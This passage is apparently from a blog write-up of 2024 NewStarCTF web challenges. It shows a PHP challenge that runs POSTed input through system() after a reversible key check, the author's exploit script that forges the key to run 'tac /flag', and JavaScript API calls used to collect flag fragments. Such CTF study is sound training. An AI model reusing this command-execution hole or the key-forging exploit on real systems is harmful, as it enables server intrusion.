<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="Hsad"><meta name="copyright" content="Hsad"><meta name="generator" content="Hexo 7.2.0"><meta name="theme" content="hexo-theme-yun"><title>2024NewStarCTF-web | Hsad's Blog</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/favicon.ico"><link rel="mask-icon" href="/favicon.ico" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"hsad.xyz","root":"/","title":"所以你弃权","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="Week1web智械危机(decrypt)robots.txt得到提示  &lt;?php  function execute_cmd($cmd) &#123;     system($cmd); &#125;  function decrypt_request($cmd, $key) &#123;     $decoded_key &#x3D; base64_decode($key);     $reve">
<meta property="og:type" content="article">
<meta property="og:title" content="2024NewStarCTF-web">
<meta property="og:url" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/index.html">
<meta property="og:site_name" content="Hsad&#39;s Blog">
<meta property="og:description" content="Week1web智械危机(decrypt)robots.txt得到提示  &lt;?php  function execute_cmd($cmd) &#123;     system($cmd); &#125;  function decrypt_request($cmd, $key) &#123;     $decoded_key &#x3D; base64_decode($key);     $reve">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/js.png">
<meta property="og:image" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/js2.png">
<meta property="og:image" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/js3.png">
<meta property="og:image" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/location.png">
<meta property="og:image" content="https://hsad.xyz/2024NewStarCTF/http2.png">
<meta property="og:image" content="https://hsad.xyz/2024NewStarCTF/http3.png">
<meta property="og:image" content="https://hsad.xyz/2024NewStarCTF/http4.png">
<meta property="og:image" content="https://hsad.xyz/2024NewStarCTF/http5.png">
<meta property="og:image" content="https://hsad.xyz/2024NewStarCTF/http6.png">
<meta property="og:image" content="https://hsad.xyz/2024NewStarCTF/http0.png">
<meta property="og:image" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/pangbai2_git.png">
<meta property="og:image" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/pangbai2_stash.png">
<meta property="article:published_time" content="2024-10-01T02:07:21.000Z">
<meta property="article:modified_time" content="2024-10-20T14:49:49.281Z">
<meta property="article:author" content="Hsad">
<meta property="article:tag" content="NewStarCTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hsad.xyz/2024/10/01/2024NewStarCTF/js.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="Hsad"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="Hsad"><span class="site-author-status" title="凉">☺️</span></a><div class="site-author-name"><a href="/about/">Hsad</a></div><span class="site-name">Hsad's Blog</span><sub class="site-subtitle">一个人的世界</sub><div class="site-description">翻着我们的照片 想念若隐若现</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">42</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">6</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">40</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://qm.qq.com/cgi-bin/qm/qr?k=EYiK7-b5ur1mWxbX7aV2AEBsuoW9c732" title="QQ" target="_blank" style="color:orange"><span class="icon iconify" data-icon="ri:qq-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/watanabe-hsad" title="GitHub" target="_blank" style="color:#181717"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:dubian.zzy@outlook.com" title="E-Mail" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:mail-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Week1"><span class="toc-number">1.</span> <span class="toc-text">Week1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web"><span class="toc-number">1.1.</span> <span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%99%BA%E6%A2%B0%E5%8D%B1%E6%9C%BA-decrypt"><span class="toc-number">1.1.1.</span> <span class="toc-text">智械危机(decrypt)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BC%9A%E8%B5%A2%E5%90%97-js"><span class="toc-number">1.1.2.</span> <span class="toc-text">会赢吗(js)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%A2%E8%B0%A2%E7%9A%AE%E8%9B%8B"><span class="toc-number">1.1.3.</span> <span class="toc-text">谢谢皮蛋</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#PangBai-%E8%BF%87%E5%AE%B6%E5%AE%B6%EF%BC%881%EF%BC%89"><span class="toc-number">1.1.4.</span> <span class="toc-text">PangBai 过家家（1）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Week2"><span class="toc-number">2.</span> <span class="toc-text">Week2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web-1"><span class="toc-number">2.1.</span> <span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%A0%E8%83%BD%E5%9C%A8%E4%B8%80%E7%A7%92%E5%86%85%E6%89%93%E5%87%BA%E5%85%AB%E5%8F%A5%E8%8B%B1%E6%96%87%E5%90%97"><span class="toc-number">2.1.1.</span> <span class="toc-text">你能在一秒内打出八句英文吗</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%81%97%E5%A4%B1%E7%9A%84%E6%8B%89%E9%93%BE"><span class="toc-number">2.1.2.</span> <span class="toc-text">遗失的拉链</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%A2%E8%B0%A2%E7%9A%AE%E8%9B%8B-plus"><span class="toc-number">2.1.3.</span> <span class="toc-text">谢谢皮蛋 plus</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#PangBai-%E8%BF%87%E5%AE%B6%E5%AE%B6%EF%BC%882%EF%BC%89"><span class="toc-number">2.1.4.</span> <span class="toc-text">PangBai 过家家（2）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A4%8D%E8%AF%BB%E6%9C%BA"><span class="toc-number">2.1.5.</span> <span class="toc-text">复读机</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Week3"><span class="toc-number">3.</span> <span class="toc-text">Week3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web-2"><span class="toc-number">3.1.</span> <span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Include-Me"><span class="toc-number">3.1.1.</span> <span class="toc-text">Include Me</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%87%AD%E7%9A%AE%E8%B8%A9%E8%B8%A9%E8%83%8C"><span class="toc-number">3.1.2.</span> <span class="toc-text">臭皮踩踩背</span></a></li></ol></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://hsad.xyz/2024/10/01/2024NewStarCTF/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Hsad"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Hsad's Blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">2024NewStarCTF-web</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2024-10-01 10:07:21" itemprop="dateCreated datePublished" datetime="2024-10-01T10:07:21+08:00">2024-10-01</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2024-10-20 22:49:49" itemprop="dateModified" datetime="2024-10-20T22:49:49+08:00">2024-10-20</time></div><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E5%AE%89%E5%85%A8%E7%9B%B8%E5%85%B3/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">安全相关</span></a></span> > <span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E5%AE%89%E5%85%A8%E7%9B%B8%E5%85%B3/CTF/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">CTF</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/NewStarCTF/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">NewStarCTF</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h2 id="Week1"><a href="#Week1" class="headerlink" title="Week1"></a>Week1</h2><h3 id="web"><a href="#web" class="headerlink" title="web"></a>web</h3><h4 id="智械危机-decrypt"><a href="#智械危机-decrypt" class="headerlink" title="智械危机(decrypt)"></a>智械危机(decrypt)</h4><p>robots.txt得到提示</p>
<pre class="language-php" data-language="php"><code class="language-php"> <span class="token php language-php"><span class="token delimiter important">&lt;?php</span>

<span class="token keyword">function</span> <span class="token function-definition function">execute_cmd</span><span class="token punctuation">(</span><span class="token variable">$cmd</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token variable">$cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">function</span> <span class="token function-definition function">decrypt_request</span><span class="token punctuation">(</span><span class="token variable">$cmd</span><span class="token punctuation">,</span> <span class="token variable">$key</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$decoded_key</span> <span class="token operator">=</span> <span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$key</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$reversed_cmd</span> <span class="token operator">=</span> <span class="token string single-quoted-string">''</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token variable">$i</span> <span class="token operator">=</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$cmd</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token variable">$i</span> <span class="token operator">>=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable">$i</span><span class="token operator">--</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$reversed_cmd</span> <span class="token operator">.=</span> <span class="token variable">$cmd</span><span class="token punctuation">[</span><span class="token variable">$i</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token variable">$hashed_reversed_cmd</span> <span class="token operator">=</span> <span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$reversed_cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$hashed_reversed_cmd</span> <span class="token operator">!==</span> <span class="token variable">$decoded_key</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Invalid key"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token variable">$decrypted_cmd</span> <span class="token operator">=</span> <span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token variable">$decrypted_cmd</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'key'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">execute_cmd</span><span class="token punctuation">(</span><span class="token function">decrypt_request</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'key'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span> </code></pre>

<p>exp:</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$cmd</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"tac /flag"</span><span class="token punctuation">;</span>
<span class="token variable">$encrypted_cmd</span> <span class="token operator">=</span> <span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token variable">$cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  <span class="token comment">// 传入</span>
<span class="token variable">$reversed_encrypted_cmd</span> <span class="token operator">=</span> <span class="token string single-quoted-string">''</span><span class="token punctuation">;</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token variable">$i</span> <span class="token operator">=</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$encrypted_cmd</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token variable">$i</span> <span class="token operator">>=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable">$i</span><span class="token operator">--</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$reversed_encrypted_cmd</span> <span class="token operator">.=</span> <span class="token variable">$encrypted_cmd</span><span class="token punctuation">[</span><span class="token variable">$i</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$hashed_reversed_encrypted_cmd</span> <span class="token operator">=</span> <span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$reversed_encrypted_cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$key</span> <span class="token operator">=</span> <span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token variable">$hashed_reversed_encrypted_cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  <span class="token comment">// 传入</span>
<span class="token keyword">echo</span> <span class="token variable">$encrypted_cmd</span> <span class="token operator">.</span> <span class="token string double-quoted-string">"\n"</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$key</span> <span class="token operator">.</span> <span class="token string double-quoted-string">"\n"</span><span class="token punctuation">;</span></span></code></pre>

<h4 id="会赢吗-js"><a href="#会赢吗-js" class="headerlink" title="会赢吗(js)"></a>会赢吗(js)</h4><p>查看源码</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span> flag第一部分：ZmxhZ3tXQTB3，开始你的新学期吧！<span class="token punctuation">:</span><span class="token operator">/</span><span class="token number">4</span>cqu1siti0n <span class="token operator">--</span><span class="token operator">></span></code></pre>

<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span>
        <span class="token keyword">async</span> <span class="token keyword">function</span> <span class="token function">revealFlag</span><span class="token punctuation">(</span><span class="token parameter">className</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">try</span> <span class="token punctuation">&#123;</span>
                <span class="token keyword">const</span> response <span class="token operator">=</span> <span class="token keyword">await</span> <span class="token function">fetch</span><span class="token punctuation">(</span><span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">/api/flag/</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>className<span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token template-punctuation string">`</span></span><span class="token punctuation">,</span> <span class="token punctuation">&#123;</span>
                    <span class="token literal-property property">method</span><span class="token operator">:</span> <span class="token string">'POST'</span><span class="token punctuation">,</span>
                    <span class="token literal-property property">headers</span><span class="token operator">:</span> <span class="token punctuation">&#123;</span>
                        <span class="token string-property property">'Content-Type'</span><span class="token operator">:</span> <span class="token string">'application/json'</span>
                    <span class="token punctuation">&#125;</span>
                <span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                <span class="token keyword">if</span> <span class="token punctuation">(</span>response<span class="token punctuation">.</span>ok<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                    <span class="token keyword">const</span> data <span class="token operator">=</span> <span class="token keyword">await</span> response<span class="token punctuation">.</span><span class="token function">json</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                    console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">恭喜你！你获得了第二部分的 flag: </span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>data<span class="token punctuation">.</span>flag<span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token string">\n……\n时光荏苒，你成长了很多，也发生了一些事情。去看看吧：/</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>data<span class="token punctuation">.</span>nextLevel<span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token template-punctuation string">`</span></span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
                    console<span class="token punctuation">.</span><span class="token function">error</span><span class="token punctuation">(</span><span class="token string">'请求失败，请检查输入或服务器响应。'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                <span class="token punctuation">&#125;</span>
            <span class="token punctuation">&#125;</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>error<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                console<span class="token punctuation">.</span><span class="token function">error</span><span class="token punctuation">(</span><span class="token string">'请求过程中出现错误:'</span><span class="token punctuation">,</span> error<span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
        <span class="token punctuation">&#125;</span>

        <span class="token comment">// 控制台提示</span>
        console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token string">"你似乎对这门叫做4cqu1siti0n的课很好奇？那就来看看控制台吧！"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<p><img src="js.png" loading="lazy"></p>
<pre class="language-json" data-language="json"><code class="language-json"><span class="token punctuation">&#123;</span><span class="token property">"flag"</span><span class="token operator">:</span><span class="token string">"IV95NF9yM2Fs"</span><span class="token punctuation">,</span><span class="token property">"nextLevel"</span><span class="token operator">:</span><span class="token string">"s34l"</span><span class="token punctuation">&#125;</span></code></pre>

<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span>
       document<span class="token punctuation">.</span><span class="token function">addEventListener</span><span class="token punctuation">(</span><span class="token string">'DOMContentLoaded'</span><span class="token punctuation">,</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
           <span class="token keyword">const</span> form <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">'seal_him'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
           <span class="token keyword">const</span> stateElement <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">'state'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
           <span class="token keyword">const</span> messageElement <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">'message'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

           form<span class="token punctuation">.</span><span class="token function">addEventListener</span><span class="token punctuation">(</span><span class="token string">'submit'</span><span class="token punctuation">,</span> <span class="token keyword">async</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token parameter">event</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
               event<span class="token punctuation">.</span><span class="token function">preventDefault</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

 
               <span class="token keyword">if</span> <span class="token punctuation">(</span>stateElement<span class="token punctuation">.</span>textContent<span class="token punctuation">.</span><span class="token function">trim</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">!==</span> <span class="token string">'解封'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                   messageElement<span class="token punctuation">.</span>textContent <span class="token operator">=</span> <span class="token string">'如何是好？'</span><span class="token punctuation">;</span>
                   <span class="token keyword">return</span><span class="token punctuation">;</span>
               <span class="token punctuation">&#125;</span>

               <span class="token keyword">try</span> <span class="token punctuation">&#123;</span>
                   <span class="token keyword">const</span> response <span class="token operator">=</span> <span class="token keyword">await</span> <span class="token function">fetch</span><span class="token punctuation">(</span><span class="token string">'/api/flag/s34l'</span><span class="token punctuation">,</span> <span class="token punctuation">&#123;</span>
                       <span class="token literal-property property">method</span><span class="token operator">:</span> <span class="token string">'POST'</span><span class="token punctuation">,</span>
                       <span class="token literal-property property">headers</span><span class="token operator">:</span> <span class="token punctuation">&#123;</span>
                           <span class="token string-property property">'Content-Type'</span><span class="token operator">:</span> <span class="token string">'application/json'</span>
                       <span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
                       <span class="token literal-property property">body</span><span class="token operator">:</span> <span class="token constant">JSON</span><span class="token punctuation">.</span><span class="token function">stringify</span><span class="token punctuation">(</span><span class="token punctuation">&#123;</span> <span class="token literal-property property">csrf_token</span><span class="token operator">:</span> document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">'csrf_token'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>value <span class="token punctuation">&#125;</span><span class="token punctuation">)</span>
                   <span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

                   <span class="token keyword">if</span> <span class="token punctuation">(</span>response<span class="token punctuation">.</span>ok<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                       <span class="token keyword">const</span> data <span class="token operator">=</span> <span class="token keyword">await</span> response<span class="token punctuation">.</span><span class="token function">json</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                       messageElement<span class="token punctuation">.</span>textContent <span class="token operator">=</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">第三部分Flag: </span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>data<span class="token punctuation">.</span>flag<span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token string">, 你解救了五条悟！下一关: /</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>data<span class="token punctuation">.</span>nextLevel <span class="token operator">||</span> <span class="token string">'无'</span><span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token template-punctuation string">`</span></span><span class="token punctuation">;</span>
                   <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
                       messageElement<span class="token punctuation">.</span>textContent <span class="token operator">=</span> <span class="token string">'请求失败，请重试。'</span><span class="token punctuation">;</span>
                   <span class="token punctuation">&#125;</span>
               <span class="token punctuation">&#125;</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>error<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                   messageElement<span class="token punctuation">.</span>textContent <span class="token operator">=</span> <span class="token string">'请求过程中出现错误，请重试。'</span><span class="token punctuation">;</span>
               <span class="token punctuation">&#125;</span>
           <span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
       <span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<p><img src="js2.png" loading="lazy"></p>
<pre class="language-json" data-language="json"><code class="language-json"><span class="token punctuation">&#123;</span><span class="token property">"flag"</span><span class="token operator">:</span><span class="token string">"MXlfR3I0c1B"</span><span class="token punctuation">,</span><span class="token property">"nextLevel"</span><span class="token operator">:</span><span class="token string">"Ap3x"</span><span class="token punctuation">&#125;</span></code></pre>

<p><img src="js3.png" loading="lazy"></p>
